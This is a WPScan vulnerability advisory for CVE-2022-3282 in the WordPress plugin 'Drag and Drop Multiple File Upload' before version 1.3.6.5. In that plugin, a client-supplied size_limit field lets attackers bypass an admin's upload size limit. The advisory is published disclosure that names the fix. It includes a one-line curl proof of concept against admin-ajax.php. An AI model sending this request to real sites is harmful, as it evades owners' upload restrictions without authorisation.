WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Drag and Drop Multiple File Upload < 1.3.6.5 - File Upload Size Limit Bypass

Description

The plugin does not properly check for the upload size limit set in forms, taking the value from user input sent when submitting the form. As a result, attackers could control the file length limit and bypass the limit set by admins in the contact form.

Proof of Concept

curl -X POST -F "size_limit=10485760" -F "action=dnd_codedropz_upload" -F "type=click" -F "form_id=156" -F "upload_name=upload-file-235" -F "[email protected]"  https://example.com/wordpress/wp-admin/admin-ajax.php

Affects Plugins

drag-and-drop-multiple-file-upload-contact-form-7
Fixed in version 1.3.6.5

References

CVE
CVE-2022-3282

Classification

Type

BYPASS

Miscellaneous

Original Researcher

Sanjay Das

Submitter

Sanjay Das

Submitter website
https://p3n7a90n.github.io/
Submitter twitter
https://twitter.com/p3n7a90n
Verified

Yes

WPVDB ID
035dffef-4b4b-4afb-9776-7f6c5e56452c

Timeline

Publicly Published

2022-09-26 (about 8 months ago)

Added

2022-09-26 (about 8 months ago)

Last Updated

2022-09-26 (about 8 months ago)

Our Other Services

WPScan WordPress Security Plugin